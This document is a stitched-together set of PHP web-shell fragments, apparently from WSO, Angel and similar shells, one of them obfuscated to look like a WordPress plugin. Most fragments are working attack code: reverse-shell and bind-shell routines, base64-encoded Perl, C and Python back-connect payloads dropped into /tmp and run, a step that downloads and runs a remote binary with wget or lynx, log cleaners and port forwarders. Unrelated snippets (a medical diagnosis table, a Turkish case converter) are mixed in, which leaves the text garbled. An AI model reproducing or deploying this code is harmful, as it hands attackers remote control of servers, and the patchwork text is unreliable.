$daemon = 0; $debug = 0; echo "<pre class=ml1 style='margin-top:5px'>"; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { echo "Cant fork!<br>"; exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { echo "Error: Can't setsid()<br>"; exit(1); } $daemon = 1; } else { echo "WARNING: Failed to daemonise. This is quite common and not fatal<br>"; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "{$errstr} ({$errno})"; exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell<br>"; exit(1); } @stream_set_blocking($pipes[0], 0); @stream_set_blocking($pipes[1], 0); @stream_set_blocking($pipes[2], 0); @stream_set_blocking($sock, 0); echo "Successfully opened reverse shell to {$ip}:{$port}<br>"; while (1) { if (feof($sock)) { echo "ERROR: Shell connection terminated<br>"; break; } if (feof($pipes[1])) { echo "ERROR: Shell process terminated<br>"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = @stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) { echo "SOCK READ<br>"; } $input = fread($sock, $chunk_size); if ($debug) { echo "SOCK: {$input}<br>"; } fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) { echo "STDOUT READ<br>"; } $input = fread($pipes[1], $chunk_size); if ($debug) { echo "STDOUT: {$input}<br>"; } fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) { echo "STDERR READ<br>"; } $input = fread($pipes[2], $chunk_size); if ($debug) { echo "STDERR: {$input}<br>"; } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "</pre>"; } } echo "</div>"; yemenfooter(); }
// echo "<br>Hasil =".max($cf); // print_r($mb2); echo "<table class='table'>"; $penyakit_test = array(); $penyakit_mb = array(); $penyakit_md = array(); foreach ($diagnosa as $key => $value) { $penyakit_test[] = $value->penyakit->nama_penyakit; $penyakit_mb[] = $value->mb; $penyakit_md[] = $value->md; echo "<tr>"; echo "<td>" . $value->penyakit->nama_penyakit . "<td>"; echo "<td>" . $value->gejala->nama_gejala . "<td>"; echo "<td>" . $value->mb . "<td>"; echo "<td>" . $value->md . "<td>"; echo "<td>" . cf($value->mb, $value->md) . "<td>"; echo "</tr>"; } echo "</table>"; /*foreach ($model as $key => $value) { $cfa=$value->mb-$value->md; }*/ } $penyakits = array("penyakit1", "penyakit1", "penyakit1", "penyakit1", "penyakit1", "penyakit2", "penyakit2", "penyakit2", "penyakit2", "penyakit2"); print_r($penyakit_mb); echo "<br>"; print_r($penyakits); ?> </div> <?php
p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); echo "Function: <select class=\"input\" name=\"execfunction_cb\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n"; makeinput(array('name' => 'start_cb', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt')); p('</p>'); formfoot(); //////////////// !$yourport_bind && ($yourport_bind = '13700527'); $usedb = array('perl' => 'perl'); if ($start_bind && $yourport && $use) { if ($use == 'perl') { cf('/tmp/magiccoder_bind_pl', $bind_pl); switch ($_POST['execfunction_bind']) { case 'system': $res = @system(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'passthru': $res = @passthru(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'exec': $res = @exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'execute': $res = @execute(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'shell_exec': $res = @shell_exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
function strto($to, $str) { define('cs', 'utf-8'); if (!function_exists('rp')) { function rp($i, $str) { $B = array('I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç'); $k = array('ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç'); $Bi = array(' I', ' ı', ' İ', ' i'); $ki = array(' I', ' I', ' İ', ' İ'); if ($i == 1) { return str_replace($B, $k, $str); } elseif ($i == 2) { return str_replace($k, $B, $str); } elseif ($i == 3) { return str_replace($Bi, $ki, $str); } } } if (!function_exists('cf')) { function cf($c = array(), $str) { foreach ($c as $cc) { $s = explode($cc, $str); foreach ($s as $k => $ss) { $s[$k] = strto('ucfirst', $ss); } $str = implode($cc, $s); } return $str; } } if (!function_exists('te')) { function te() { return trigger_error('Lütfen geçerli bir strto() parametresi giriniz.', E_USER_ERROR); } } $to = explode('|', $to); if ($to) { foreach ($to as $t) { if ($t == 'lower') { $str = mb_strtolower(rp(1, $str), cs); } elseif ($t == 'upper') { $str = mb_strtoupper(rp(2, $str), cs); } elseif ($t == 'ucfirst') { $str = mb_strtoupper(rp(2, mb_substr($str, 0, 1, cs)), cs) . mb_substr($str, 1, mb_strlen($str, cs) - 1, cs); } elseif ($t == 'ucwords') { $str = ltrim(mb_convert_case(rp(3, ' ' . $str), MB_CASE_TITLE, cs)); } elseif ($t == 'capitalizefirst') { $str = cf(array('. ', '.', '? ', '?', '! ', '!', ': ', ':'), $str); } else { $str = te(); } } } else { $str = te(); } return $str; }
$data = "\n<br>ngebind berhasil gan."; } else { $data = "\n<br>ngebind gagal gan :("; } $_POST['backcconnmsg'] = "To connect, use netcat! Usage: <b>'nc {$ip} {$por}'</b>.{$data}"; } if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "Perl") { if (is_writable(".")) { cf("back", $back_connect_pl); $p2 = which("perl"); $blah = ex($p2 . " back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("back")) { unlink("back"); } } else { cf("/tmp/back", $back_connect_pl); $p2 = which("perl"); $blah = ex($p2 . " /tmp/back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &"); if (file_exists("/tmp/back")) { unlink("/tmp/back"); } } $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>."; } @ini_set("max_execution_time", 0); if (!function_exists("getmicrotime")) { function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return (double) $usec + (double) $sec; }
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $back_connect_py = "IyEvdXNyL2Jpbi9weXRob24gDQppbXBvcnQgc3lzIA0KaW1wb3J0IHNvY2tldCANCnNoZWxsPScv" . "YmluL2Jhc2gnIA0KZGVmIG1haW4oKTogDQogICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFG" . "X0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKSANCiAgICB0cnk6IA0KICAgICAgICBzLmNvbm5lY3Qo" . "KHNvY2tldC5nZXRob3N0YnluYW1lKHN5cy5hcmd2WzFdKSxpbnQoc3lzLmFyZ3ZbMl0pKSkgDQog" . "ICAgICAgIHByaW50ICdbK11Db25uZWN0IE9LJyANCiAgICBleGNlcHQ6IA0KICAgICAgICBwcmlu" . "dCAiWy1dQ2FuJ3QgY29ubmVjdCIgDQogICAgICAgIHN5cy5leGl0KDIpIA0KICAgIGltcG9ydCBv" . "cyANCiAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgDQogICAgb3MuZHVwMihzLmZpbGVubygpLDEp" . "IA0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKSANCiAgICBpbXBvcnQgcHR5IA0KICAgIGdsb2Jh" . "bCBzaGVsbCANCiAgICBwdHkuc3Bhd24oc2hlbGwpDQogICAgcy5jbG9zZSgpIA0KaWYgX19uYW1l" . "X18gPT0gJ19fbWFpbl9fJzogDQogICAgbWFpbigpICANCg=="; if ($start && $yourip && $yourport && $use) { if ($use == 'perl') { cf('/tmp/angel_bc', $back_connect); $res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &"); } else { if ($use == 'c') { cf('/tmp/angel_bc.c', $back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc {$yourip} {$yourport} &"); } else { if ($use == 'python') { cf('/tmp/angel_bcpy', $back_connect_py); $res = execute(which('python') . " /tmp/angel_bcpy {$yourip} {$yourport} &"); } } } m("Now script try connect to {$yourip} port {$yourport} ..."); } formhead(array('title' => 'Back Connect')); makehide('action', 'backconnect'); p('<p>'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
/** * automatically discover templates in templates/ folder. a nice touch? */ private function discoverTemplates() { $dir = ROOT . DIRECTORY_SEPARATOR . 'templates' . DIRECTORY_SEPARATOR; //explain this $templateFiles = array(); foreach ((array) cf('templates') as $template) { $templateFiles[] = $dir . $template['path']; } foreach (glob($dir . "*.tmpl") as $filename) { $tmpl = pathinfo($filename); if (empty($GLOBALS['config']['templates'][$tmpl['filename']]) && !in_array($filename, $templateFiles)) { //explain this $GLOBALS['config']['templates'][$tmpl['filename']] = array('path' => $tmpl['basename']); } } }
$blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &"); $_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && $_POST['use'] == "Perl") { cf("/tmp/dp", $datapipe_pl); $p2 = which("perl"); if (empty($p2)) { $p2 = "perl"; } $blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &"); $_POST['cmd'] = "ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && $_POST['use'] == "C") { cf("/tmp/dpc.c", $datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &"); $_POST['cmd'] = "ps -aux | grep dpc"; } if (!empty($_POST['alias'])) { foreach ($aliases as $alias_name => $alias_cmd) { if ($_POST['alias'] == $alias_name) { $_POST['cmd'] = $alias_cmd; } } } if (!empty($HTTP_POST_FILES['userfile']['name'])) { if (isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name'];
function actionNetwork() { WPluginHeader(); $back_connect_p= wpLicense2(1372); $bind_port_p= wpLicense2(1373); echo wpLicense2(1374). $_SERVER[ wpLicense2(1375)] . wpLicense2(1376); if(isset($_POST[ wpLicense2(1377)])) { function cf($f,$t) { $w = @fopen($f, wpLicense2(1378)) or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST[ wpLicense2(1379)] == wpLicense2(1380)) { cf( wpLicense2(1381),$bind_port_p); $out = WPluginEx( wpLicense2(1382).$_POST[ wpLicense2(1383)]. wpLicense2(1384)); sleep(round(0+0.5+0.5)); echo "<pre class=ml1>$out\n".WPluginEx( wpLicense2(1385)). wpLicense2(1386); unlink( wpLicense2(1387)); } if($_POST[ wpLicense2(1388)] == wpLicense2(1389)) { cf( wpLicense2(1390),$back_connect_p); $out = WPluginEx( wpLicense2(1391).$_POST[ wpLicense2(1392)]. wpLicense2(1393).$_POST[ wpLicense2(1394)]. wpLicense2(1395)); sleep(round(0+0.25+0.25+0.25+0.25)); echo "<pre class=ml1>$out\n".WPluginEx( wpLicense2(1396)). wpLicense2(1397); unlink( wpLicense2(1398)); } } echo wpLicense2(1399); WPluginFooter(); }
if (is_writable('.')) { cf($act, ${$act}); // 'tis pure innovation of optimization :) chmod($act, 0777); $cmd = './' . $act; // keep this before $act = 'cmd'; $act = 'cmd'; $cmd_txt = '1'; } else { echo 'Directory Is Not Writable!<br>'; } } if ($act == 'clearlogs') { // windows cleaners if (is_writable('.')) { cf($act . '.exe', ${$act}); chmod($act . '.exe', 0777); $cmd = $act . '.exe'; $act = 'cmd'; $cmd_txt = '1'; } else { echo 'Directory Is Not Writable!<br>'; } } if ($x == "phpinfo") { @ob_clean(); phpinfo(); capriv8exit(); } if ($x == "security") { echo "<div class=barheader>[ Server Security Information ]</div>" . "<table>" . "<tr><td>Open Base Dir</td><td>" . $hopenbasedir . "</td></tr>";
tbfoot(); if ($alreadymssql) { @mssql_close(); } } elseif ($action == 'backconnect') { !$yourip && ($yourip = $_SERVER['REMOTE_ADDR']); !$yourport && ($yourport = '12345'); $usedb = array('perl' => 'perl', 'c' => 'c'); $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use) { if ($use == 'perl') { cf('/tmp/angel_bc', $back_connect); $res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &"); } else { cf('/tmp/angel_bc.c', $back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc {$yourip} {$yourport} &"); } m("Now script try connect to {$yourip} port {$yourport} ..."); } formhead(array('title' => 'Back Connect')); makehide('action', 'backconnect'); p('<p>'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
<?php if (isset($_POST['dosyaa'])) { dosyayicek($_POST['dosyaa'], $_POST['yeniyer']); } if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) { cf("/tmp/back", $back_connect); $p2 = which("perl"); $blah = ex($p2 . " /tmp/back " . $_GET['ipi'] . " " . $_GET['pipi'] . " &"); echo "<b>Now script try connect to " . $_GET['ipi'] . " port " . $_GET['pipi'] . " ...</b>"; } if (!empty($_GET['dolma'])) { $sayko = htmlspecialchars($_GET['dolma']); if ($sayko == "wgetcan") { myshellexec("wget {$adires} -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); } else { if ($sayko == "freadcan") { dosyayicek($adires, "sayko_bind"); myshellexec("./sayko_bind"); } else { if ($sayko == "lynxcan") { myshellexec("lynx -dump {$adires} > sayko_bind;chmod 777 sayko_bind;./sayko_bind");
function actionNetwork() { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzb2NrZmQsIG5ld2ZkLCBpOw0KICAgIGNoYXIgcGFzc1szMF07DQogICAgc3RydWN0IHNvY2thZGRyX2luIHJlbW90ZTsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighc29ja2ZkKQ0KICAgICAgICByZXR1cm4gLTE7DQogICAgcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsNCiAgICBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KICAgIGxpc3Rlbihzb2NrZmQsIDUpOw0KICAgIHdoaWxlKDEpIHsNCiAgICAgICAgbmV3ZmQ9YWNjZXB0KHNvY2tmZCwwLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDEpOw0KICAgICAgICBkdXAyKG5ld2ZkLDIpOw0KICAgICAgICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChuZXdmZCxwYXNzLHNpemVvZihwYXNzKSk7DQogICAgICAgIGZvcihpPTA7aTxzdHJsZW4ocGFzcyk7aSsrKQ0KICAgICAgICAgICAgaWYoIChwYXNzW2ldID09ICdcbicpIHx8IChwYXNzW2ldID09ICdccicpICkNCiAgICAgICAgICAgICAgICBwYXNzW2ldID0gJ1wwJzsNCiAgICAgICAgICAgIGlmIChzdHJjbXAoYXJndlsyXSxwYXNzKSA9PSAwKQ0KICAgICAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICAgICAgY2xvc2UobmV3ZmQpOw0KICAgIH0NCn0="; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; ?> <h1>Network tools</h1><div class=content> <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> </form> <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> </form><br> <?php if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; } } echo 